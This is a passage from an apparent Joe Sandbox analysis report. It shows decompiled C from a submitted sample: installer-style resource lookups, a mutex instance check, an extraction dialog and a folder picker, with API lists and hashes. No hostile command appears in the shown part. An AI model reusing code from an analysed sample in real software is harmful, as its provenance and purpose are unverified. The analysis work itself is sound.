										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x10e8184 != 0) {
										__imp__#17();
									}
									if( *0x10e8a24 == 0) {
										_t57 = _t65;
										if(E010E36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x10e9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x10e9a34 & 0x00000100) == 0 || ( *0x10e8a38 & 0x00000001) != 0 || E010E18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E010E6517(_t57, 0x7d6, _t34, E010E19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E010E2390(0x10e8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E010E44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E010E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x10e8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x10e9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E010E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E010E44B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x10e8588);
										 *0x10e9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x10e9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E010E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                                0x010e2cb5
                                                                                                                                                                                                                                                0x010e2cbc
                                                                                                                                                                                                                                                0x010e2cc7
                                                                                                                                                                                                                                                0x010e2cc9
                                                                                                                                                                                                                                                0x010e2cd1
                                                                                                                                                                                                                                                0x010e2cd3
                                                                                                                                                                                                                                                0x010e2cd9
                                                                                                                                                                                                                                                0x010e2ce9
                                                                                                                                                                                                                                                0x010e2cf9
                                                                                                                                                                                                                                                0x010e2d0e
                                                                                                                                                                                                                                                0x010e2d15
                                                                                                                                                                                                                                                0x010e2d1c
                                                                                                                                                                                                                                                0x010e2ef3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2d2d
                                                                                                                                                                                                                                                0x010e2d34
                                                                                                                                                                                                                                                0x010e2d3b
                                                                                                                                                                                                                                                0x010e2d40
                                                                                                                                                                                                                                                0x010e2d48
                                                                                                                                                                                                                                                0x010e2d59
                                                                                                                                                                                                                                                0x010e2d84
                                                                                                                                                                                                                                                0x010e2e1f
                                                                                                                                                                                                                                                0x010e2e1f
                                                                                                                                                                                                                                                0x010e2e2e
                                                                                                                                                                                                                                                0x010e2e41
                                                                                                                                                                                                                                                0x010e2e5a
                                                                                                                                                                                                                                                0x010e2e62
                                                                                                                                                                                                                                                0x010e2e6c
                                                                                                                                                                                                                                                0x010e2e6c
                                                                                                                                                                                                                                                0x010e2e75
                                                                                                                                                                                                                                                0x010e2e77
                                                                                                                                                                                                                                                0x010e2e77
                                                                                                                                                                                                                                                0x010e2e84
                                                                                                                                                                                                                                                0x010e2e8b
                                                                                                                                                                                                                                                0x010e2e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2e96
                                                                                                                                                                                                                                                0x010e2e96
                                                                                                                                                                                                                                                0x010e2e9e
                                                                                                                                                                                                                                                0x010e2ea2
                                                                                                                                                                                                                                                0x010e2eba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2ece
                                                                                                                                                                                                                                                0x010e2ede
                                                                                                                                                                                                                                                0x010e2eed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2eed
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2eef
                                                                                                                                                                                                                                                0x010e2ea2
                                                                                                                                                                                                                                                0x010e2e86
                                                                                                                                                                                                                                                0x010e2e88
                                                                                                                                                                                                                                                0x010e2e88
                                                                                                                                                                                                                                                0x010e2e43
                                                                                                                                                                                                                                                0x010e2e48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2e48
                                                                                                                                                                                                                                                0x010e2e30
                                                                                                                                                                                                                                                0x010e2e30
                                                                                                                                                                                                                                                0x010e2ef8
                                                                                                                                                                                                                                                0x010e2f01
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2f01
                                                                                                                                                                                                                                                0x010e2d8a
                                                                                                                                                                                                                                                0x010e2d8f
                                                                                                                                                                                                                                                0x010e2da1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2da3
                                                                                                                                                                                                                                                0x010e2dae
                                                                                                                                                                                                                                                0x010e2db4
                                                                                                                                                                                                                                                0x010e2dbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2dca
                                                                                                                                                                                                                                                0x010e2dd3
                                                                                                                                                                                                                                                0x010e2df5
                                                                                                                                                                                                                                                0x010e2e02
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2dd5
                                                                                                                                                                                                                                                0x010e2dde
                                                                                                                                                                                                                                                0x010e2de3
                                                                                                                                                                                                                                                0x010e2e04
                                                                                                                                                                                                                                                0x010e2e0a
                                                                                                                                                                                                                                                0x010e2e10
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2e10
                                                                                                                                                                                                                                                0x010e2dd3
                                                                                                                                                                                                                                                0x010e2dbb
                                                                                                                                                                                                                                                0x010e2da1
                                                                                                                                                                                                                                                0x010e2d5b
                                                                                                                                                                                                                                                0x010e2d5b
                                                                                                                                                                                                                                                0x010e2d5d
                                                                                                                                                                                                                                                0x010e2d69
                                                                                                                                                                                                                                                0x010e2d6e
                                                                                                                                                                                                                                                0x010e2f06
                                                                                                                                                                                                                                                0x010e2f06
                                                                                                                                                                                                                                                0x010e2f06
                                                                                                                                                                                                                                                0x010e2d59
                                                                                                                                                                                                                                                0x010e2f18

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2CD9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2CE9
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E2CF9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D34
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D40
                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DAE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DBD
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2E0A
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                                • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                                • Opcode ID: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                                                                                                                                                                                                                                                • Instruction ID: 01148ec295ee094816655b86a1042b53477751706ba9d9cd9aa7aab56bc868e4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451D7703403119EF774AA279D4DB7A3ADCEB95B04F04806DE6C1DA2C9DAB9C8418751
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                                			E010E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x10e91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x10e8584 = _t35;
					E010E43D0(_t35, GetDesktopWindow());
					__eflags =  *0x10e8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E010E4FE0, 0, 0, 0x10e8798);
					 *0x10e879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E010E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x10e858c);
					_t38 =  *0x10e8584; // 0x0
					_t25 = E010E44B9(_t38, 0x4b2, 0x10e1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x10e91d8 = 1;
						SetEvent( *0x10e858c);
						_t39 =  *0x10e879c; // 0x0
						E010E3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x10e858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x10e879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                                0x010e34fb
                                                                                                                                                                                                                                                0x010e34fe
                                                                                                                                                                                                                                                0x010e3665
                                                                                                                                                                                                                                                0x010e3666
                                                                                                                                                                                                                                                0x010e3666
                                                                                                                                                                                                                                                0x010e3668
                                                                                                                                                                                                                                                0x010e366e
                                                                                                                                                                                                                                                0x010e366e
                                                                                                                                                                                                                                                0x010e3671
                                                                                                                                                                                                                                                0x010e3671
                                                                                                                                                                                                                                                0x010e3677
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3677
                                                                                                                                                                                                                                                0x010e3504
                                                                                                                                                                                                                                                0x010e3506
                                                                                                                                                                                                                                                0x010e3507
                                                                                                                                                                                                                                                0x010e350c
                                                                                                                                                                                                                                                0x010e365b
                                                                                                                                                                                                                                                0x010e365f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3661
                                                                                                                                                                                                                                                0x010e3512
                                                                                                                                                                                                                                                0x010e3515
                                                                                                                                                                                                                                                0x010e35be
                                                                                                                                                                                                                                                0x010e35c1
                                                                                                                                                                                                                                                0x010e35d1
                                                                                                                                                                                                                                                0x010e35d8
                                                                                                                                                                                                                                                0x010e35de
                                                                                                                                                                                                                                                0x010e35f8
                                                                                                                                                                                                                                                0x010e3617
                                                                                                                                                                                                                                                0x010e3617
                                                                                                                                                                                                                                                0x010e3623
                                                                                                                                                                                                                                                0x010e3637
                                                                                                                                                                                                                                                0x010e363d
                                                                                                                                                                                                                                                0x010e3642
                                                                                                                                                                                                                                                0x010e3644
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3646
                                                                                                                                                                                                                                                0x010e3652
                                                                                                                                                                                                                                                0x010e3657
                                                                                                                                                                                                                                                0x010e3658
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3658
                                                                                                                                                                                                                                                0x010e3644
                                                                                                                                                                                                                                                0x010e351b
                                                                                                                                                                                                                                                0x010e351d
                                                                                                                                                                                                                                                0x010e354f
                                                                                                                                                                                                                                                0x010e3553
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e355f
                                                                                                                                                                                                                                                0x010e3565
                                                                                                                                                                                                                                                0x010e357c
                                                                                                                                                                                                                                                0x010e3581
                                                                                                                                                                                                                                                0x010e3584
                                                                                                                                                                                                                                                0x010e359b
                                                                                                                                                                                                                                                0x010e35a1
                                                                                                                                                                                                                                                0x010e35a7
                                                                                                                                                                                                                                                0x010e35ad
                                                                                                                                                                                                                                                0x010e35b3
                                                                                                                                                                                                                                                0x010e35b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e35b8
                                                                                                                                                                                                                                                0x010e3586
                                                                                                                                                                                                                                                0x010e3588
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3590
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3590
                                                                                                                                                                                                                                                0x010e3524
                                                                                                                                                                                                                                                0x010e3535
                                                                                                                                                                                                                                                0x010e3541
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3549
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000), ref: 010E3535
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 010E3541
                                                                                                                                                                                                                                                • ResetEvent.KERNEL32 ref: 010E355F
                                                                                                                                                                                                                                                • SetEvent.KERNEL32(010E1140,00000000,00000020,00000004), ref: 010E3590
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E35C7
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 010E35F1
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 010E35F8
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 010E3610
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 010E3617
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E3623
                                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 010E3637
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 010E3671
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                                                                                                                                                                                                                                                • Instruction ID: 1b70ce64f3507b84bd6f05b036b60da2e33cd2aff80eb21ccddd88e7c98fb504
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91314C71240201AFD7701A3BAC4DE6A3EE9F789F51F14856AF6D29F298CA7A8400CB54
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E010E4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E010E44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x10e88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x10e87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x10e8598;
					_v36 = 1;
					_v32 = E010E4200;
					_v28 = 0x10e88c0;
					 *0x10ea288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x10ea288(_t32, 0x10e88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x10e88c0 != 0) {
							E010E1680(0x10e87a0, 0x104, 0x10e88c0);
						}
						 *0x10ea288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x10e87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x10e88c0);
					_t61 = 0x10e88c0;
					_t4 =  &(_t61[1]); // 0x10e88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x10e88c0; // 0x21d1181
					_t44 = CharPrevA(0x10e88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x10e88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                                0x010e4234
                                                                                                                                                                                                                                                0x010e423c
                                                                                                                                                                                                                                                0x010e4240
                                                                                                                                                                                                                                                0x010e43b2
                                                                                                                                                                                                                                                0x010e43b7
                                                                                                                                                                                                                                                0x010e43c0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e43c5
                                                                                                                                                                                                                                                0x010e424c
                                                                                                                                                                                                                                                0x010e4252
                                                                                                                                                                                                                                                0x010e4257
                                                                                                                                                                                                                                                0x010e43a4
                                                                                                                                                                                                                                                0x010e43a5
                                                                                                                                                                                                                                                0x010e43ab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e43ab
                                                                                                                                                                                                                                                0x010e4263
                                                                                                                                                                                                                                                0x010e4269
                                                                                                                                                                                                                                                0x010e426e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e427a
                                                                                                                                                                                                                                                0x010e4280
                                                                                                                                                                                                                                                0x010e4285
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e428d
                                                                                                                                                                                                                                                0x010e4293
                                                                                                                                                                                                                                                0x010e42e6
                                                                                                                                                                                                                                                0x010e42e9
                                                                                                                                                                                                                                                0x010e42ef
                                                                                                                                                                                                                                                0x010e42f4
                                                                                                                                                                                                                                                0x010e42f7
                                                                                                                                                                                                                                                0x010e4300
                                                                                                                                                                                                                                                0x010e4307
                                                                                                                                                                                                                                                0x010e430e
                                                                                                                                                                                                                                                0x010e4315
                                                                                                                                                                                                                                                0x010e431c
                                                                                                                                                                                                                                                0x010e4322
                                                                                                                                                                                                                                                0x010e4326
                                                                                                                                                                                                                                                0x010e432d
                                                                                                                                                                                                                                                0x010e432d
                                                                                                                                                                                                                                                0x010e432f
                                                                                                                                                                                                                                                0x010e4334
                                                                                                                                                                                                                                                0x010e4343
                                                                                                                                                                                                                                                0x010e4349
                                                                                                                                                                                                                                                0x010e434d
                                                                                                                                                                                                                                                0x010e4354
                                                                                                                                                                                                                                                0x010e4354
                                                                                                                                                                                                                                                0x010e435d
                                                                                                                                                                                                                                                0x010e436e
                                                                                                                                                                                                                                                0x010e436e
                                                                                                                                                                                                                                                0x010e437d
                                                                                                                                                                                                                                                0x010e4383
                                                                                                                                                                                                                                                0x010e4387
                                                                                                                                                                                                                                                0x010e438e
                                                                                                                                                                                                                                                0x010e438e
                                                                                                                                                                                                                                                0x010e4387
                                                                                                                                                                                                                                                0x010e4391
                                                                                                                                                                                                                                                0x010e4399
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4295
                                                                                                                                                                                                                                                0x010e429f
                                                                                                                                                                                                                                                0x010e42a5
                                                                                                                                                                                                                                                0x010e42aa
                                                                                                                                                                                                                                                0x010e42aa
                                                                                                                                                                                                                                                0x010e42ad
                                                                                                                                                                                                                                                0x010e42ad
                                                                                                                                                                                                                                                0x010e42af
                                                                                                                                                                                                                                                0x010e42b0
                                                                                                                                                                                                                                                0x010e42b6
                                                                                                                                                                                                                                                0x010e42c2
                                                                                                                                                                                                                                                0x010e42c8
                                                                                                                                                                                                                                                0x010e42ce
                                                                                                                                                                                                                                                0x010e42e4
                                                                                                                                                                                                                                                0x010e42e4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e42ce

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010E4236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010E424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010E4263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010E427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,010E88C0,?,00000001), ref: 010E429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(010E88C0,021D1181,?,00000001), ref: 010E42C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(010E88C0,00000000,?,00000001), ref: 010E42D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E4391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E43A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                                                                                                                                                                                                                                                • Instruction ID: 1e8417f2b3ce7bb1c750db8e4e6ed7a0506f1304daf51aa05c7828971f8009f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941B574A00204AFE7619F7BE88C96EBFF4EB49744F04819EEAC1EB245C77988018761
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
